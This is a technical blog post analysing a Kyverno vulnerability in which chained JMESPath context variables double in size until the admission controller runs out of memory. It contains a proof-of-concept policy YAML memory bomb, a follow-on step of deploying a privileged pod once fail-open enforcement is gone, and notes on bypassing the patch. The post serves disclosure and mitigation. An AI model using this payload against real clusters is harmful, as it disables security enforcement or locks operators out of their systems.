The Policy That Ate the Cluster: Deep Dive into CVE-2026-23881
Jan 27, 2026 · 7 min read
Executive Summary (TL;DR)
Kyverno, the Kubernetes policy engine, failed to cap the memory usage of policy context variables. By chaining JMESPath variable definitions that each reference the previous one, an attacker can turn a few kilobytes of policy YAML into gigabytes of RAM usage. This OOM-kills the Kyverno controller, causing a Denial of Service. If Kyverno is configured to 'Fail-Open', security checks are bypassed. If 'Fail-Closed', the cluster becomes immutable. Patched in 1.15.3 and 1.16.3.
A logic flaw in Kyverno's variable context handling allows for exponential memory amplification (a 'Billion Laughs' style attack), enabling attackers to crash the admission controller and either bypass security policies or deadlock the cluster.
The Hook: Who Watches the Watcher?
Kubernetes is a beast. To tame it, we use admission controllers—bouncers at the API server door that check your ID and dress code before letting you in. Kyverno is one of the most popular bouncers in town. It lets you define policies like "All pods must have resource limits" or "No one runs as root." To make these policies flexible, Kyverno allows for context variables—little scratchpads where you can fetch data (like ConfigMaps) or manipulate strings before making a decision.
But here's the thing about scratchpads: if you don't limit how much someone can write on them, they're going to write until they run out of paper, or in this case, until the server runs out of RAM. CVE-2026-23881 is a classic resource exhaustion bug, but it's not caused by sending a massive payload over the wire. It's caused by sending a tiny payload that Kyverno politely agrees to turn into a massive one.
This is the logical equivalent of asking a bartender for a beer, then asking for another beer for every beer currently on the bar, recursively. Pretty soon, the bar collapses, the bartender is crushed, and nobody gets a drink. In Kubernetes terms: the admission controller crashes, and your cluster is left either undefended or completely locked down.
The Flaw: Exponential Amplification
The vulnerability lies in the pkg/engine/context component of Kyverno. When a policy is evaluated, Kyverno builds a JSON context object. This object holds variables defined in the policy. The engine processes these variables sequentially. Variable A is computed, then Variable B (which can reference A), and so on.
The developers fell into a classic trap: assuming linear resource consumption. They didn't anticipate that a user might define each variable as the previous variable concatenated with itself. Using JMESPath functions like join(), an attacker takes a string S and defines a new variable V1 as S + S, then V2 as V1 + V1, and so on. This is $O(2^n)$ growth.
Mathematically, it looks like this:
- Layer 0: 1 KB string.
- Layer 1: 2 KB (L0 + L0).
- Layer 2: 4 KB (L1 + L1).
- ...
- Layer 18: ~256 MB.
Kyverno had no global tracker for the total size of this context. It would happily allocate Go objects for each step until the process hit the container's memory limit (OOM). Because this happens during admission review, it blocks the API server's request until the timeout fires or the pod dies. It is effectively the "Billion Laughs" XML bomb attack, reincarnated in modern cloud-native YAML.
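To see how quickly the doubling runs away, here is a minimal Go sketch (purely illustrative, not Kyverno code) that prints the size of each layer, assuming a 1 KB seed and one doubling per layer:

```go
package main

import "fmt"

func main() {
	// Illustrative doubling math only: size(n) = seed * 2^n.
	// Layer n is join('', [l(n-1), l(n-1)]), i.e. the previous layer twice.
	seed := 1024 // ~1 KB seed string
	size := seed
	for layer := 0; layer <= 18; layer++ {
		fmt.Printf("layer %2d: %8d KiB\n", layer, size/1024)
		size *= 2
	}
	// Output ends at layer 18: 262144 KiB (~256 MB); one more layer would need ~512 MB.
}
```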
The Code: The Smoking Gun
Let's look at why this happened. In the vulnerable versions, the context handling was essentially a free-for-all map assignment. There was no cumulative accounting.
Here is the logic pre-patch (simplified for clarity):
// Vulnerable Logic
func (c *Context) AddContextEntry(name string, data interface{}) {
    // Just throw it in the map. Memory is free, right?
    c.jsonContext[name] = data
}

The fix, introduced in commit 7a651be3a8c78dcabfbf4178b8d89026bf3b850f, adds a maxContextSize budget. Now, every time you try to add a variable, the engine checks whether you can afford it.
// Patched Logic
func (c *Context) AddContextEntry(name string, data interface{}) error {
    // calculate the size of the new data
    size := getSize(data)
    // check the budget
    if c.currentSize+size > c.maxContextSize {
        return fmt.Errorf("context size limit exceeded: %d > %d",
            c.currentSize+size, c.maxContextSize)
    }
    c.currentSize += size
    c.jsonContext[name] = data
    return nil
}

> [!NOTE]
> The fix isn't perfect. Calculating the size of a Go interface{} is tricky. The patch often estimates size based on the raw JSON bytes, but the in-memory representation of a map in Go is significantly larger (pointers, overhead). A 2MB limit might still result in 10-20MB of actual heap usage, but it effectively stops the exponential growth to Infinity.
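To make that caveat concrete, here is one plausible way such an estimator could look. This is a hedged sketch, not the actual patched helper (the name getSizeSketch and its error handling are assumptions): it marshals the value back to JSON and counts bytes, which is exactly why the in-memory footprint can exceed the tracked size.

```go
package main

import (
	"encoding/json"
	"fmt"
	"math"
)

// getSizeSketch estimates the size of a context entry by re-marshaling it to
// JSON and counting bytes. This under-counts the real heap footprint (Go maps
// and strings carry pointer and header overhead), matching the note above.
func getSizeSketch(data interface{}) int {
	raw, err := json.Marshal(data)
	if err != nil {
		// If we cannot measure it, treat it as oversized rather than free.
		return math.MaxInt
	}
	return len(raw)
}

func main() {
	entry := map[string]interface{}{"l0": "aaaa", "nested": []int{1, 2, 3}}
	fmt.Println("estimated size (bytes):", getSizeSketch(entry))
}
```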
The Exploit: Building the Memory Bomb
Exploiting this requires permission to create a Policy or ClusterPolicy. This is usually restricted to admins, but in multi-tenant clusters or GitOps workflows, a developer might have rights to push policies to their namespace.
We don't need fancy C2 servers. We just need a recursive JMESPath loop. Here is the attack chain:
- Seed: Create a random string of 1KB.
- Amplify: Create 18 layers of variables, each joining the previous layer to itself.
- Trigger: Send a request that matches the policy (e.g., creating a ConfigMap).
context:
  - name: l0
    variable:
      jmesPath: random('[a-zA-Z0-9]{1000}') # 1KB
  - name: l1
    variable:
      jmesPath: join('', [l0, l0]) # 2KB
  # ... repeat ...
  - name: l18
    variable:
      jmesPath: join('', [l17, l17]) # 256MB

When the admission controller processes the l18 variable, it tries to allocate a contiguous 256MB string. If that passes, l19 would need 512MB. The Go runtime can no longer satisfy the allocation, the kernel invokes the OOM Killer, and the pod dies instantly.
The Impact: Fail Open or Fail Closed?
Why is this a High severity and not Critical? Because it requires policy creation rights. However, the impact of a successful exploit is devastating for cluster stability.
Scenario A: failurePolicy: Ignore (The Default)
If Kyverno is configured to ignore failures when it times out or crashes, the Admission Controller effectively vanishes. The bouncer is dead, and the door is wide open. An attacker can crash Kyverno and immediately deploy a privileged pod that mounts the host filesystem, which would normally be blocked by policy.
Scenario B: failurePolicy: Fail (The Secure Choice)
If you configured Kyverno to be secure by default, crashing the controller creates a massive denial of service. Since the webhook fails, the API server rejects all requests that require validation. No new pods, no deployments, no config changes. The cluster is essentially read-only until Kyverno recovers (which it won't, if the malicious policy persists).
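For orientation, the fail-open/fail-closed choice lives on the webhook registration itself. Here is a minimal Go sketch using the upstream k8s.io/api/admissionregistration/v1 types; the webhook name is illustrative, not Kyverno's exact configuration:

```go
package main

import (
	"fmt"

	admissionregistrationv1 "k8s.io/api/admissionregistration/v1"
)

func main() {
	// Scenario A: admit requests when the webhook is down (policy bypass risk).
	ignore := admissionregistrationv1.Ignore
	// Scenario B: reject requests when the webhook is down (cluster lock-up risk).
	fail := admissionregistrationv1.Fail

	webhook := admissionregistrationv1.ValidatingWebhook{
		Name:          "validate.kyverno.example", // illustrative name only
		FailurePolicy: &ignore,                    // swap to &fail for fail-closed
	}
	fmt.Printf("webhook %q failurePolicy=%s (alternative: %s)\n",
		webhook.Name, *webhook.FailurePolicy, fail)
}
```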
Furthermore, the Reports Controller loads the same policies for background compliance scans, so it crashes too, blinding the security team to the state of the cluster.
The Fix: Mitigation & Bypass Research
The remediation is straightforward: Upgrade to Kyverno 1.15.3 or 1.16.3. These versions introduce a hard cap on context size (default 2MiB).
However, for the paranoid security researchers among us, the patch analysis reveals some interesting edges:
- Monotonic Growth: The ReplaceContextEntry function increments the size tracker but doesn't decrement it when replacing an entry. This means a long-running policy evaluation that updates variables often could hit the limit artificially. This is a potential (though minor) DoS of legitimate policies.
- Unmarshaling Overhead: The limit is on the raw bytes. Go's JSON unmarshaler is memory-hungry. An attacker could craft a context that fits the 2MB limit but is structurally complex (deeply nested maps), causing the unmarshaler to allocate far more heap memory than the size tracker accounts for.
Immediate Mitigation:
If you cannot upgrade immediately, use RBAC to strictly control who can create Policy and ClusterPolicy objects. Audit all existing policies for the usage of repeat, join, or recursive variable definitions.
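As a starting point for that audit, here is a rough, hypothetical Go helper (not an official Kyverno tool) that scans policy YAML piped in on stdin, for example from kubectl get clusterpolicies -o yaml, and flags jmesPath expressions that use join( or repeat(:

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

func main() {
	// Hypothetical audit helper: pipe policy YAML in on stdin, e.g.
	//   kubectl get clusterpolicies,policies -A -o yaml | go run audit.go
	scanner := bufio.NewScanner(os.Stdin)
	scanner.Buffer(make([]byte, 0, 1024*1024), 1024*1024) // allow long lines
	lineNo := 0
	for scanner.Scan() {
		lineNo++
		line := scanner.Text()
		// Only inspect jmesPath expressions, where the amplification happens.
		if !strings.Contains(line, "jmesPath") {
			continue
		}
		lower := strings.ToLower(line)
		if strings.Contains(lower, "join(") || strings.Contains(lower, "repeat(") {
			fmt.Printf("line %d: suspicious expression: %s\n", lineNo, strings.TrimSpace(line))
		}
	}
	if err := scanner.Err(); err != nil {
		fmt.Fprintln(os.Stderr, "scan error:", err)
		os.Exit(1)
	}
}
```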
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Kyverno | < 1.15.3 | 1.15.3 |
| Kyverno | >= 1.16.0, < 1.16.3 | 1.16.3 |

| Attribute | Detail |
|---|---|
| CWE | CWE-770 (Resource Allocation without Limits) |
| Attack Vector | Network (via Kubernetes API) |
| CVSS v3.1 | 7.7 (High) |
| Impact | Denial of Service / Security Bypass |
| Exploit Complexity | Low (Requires Policy Creation Rights) |
| Component | pkg/engine/context |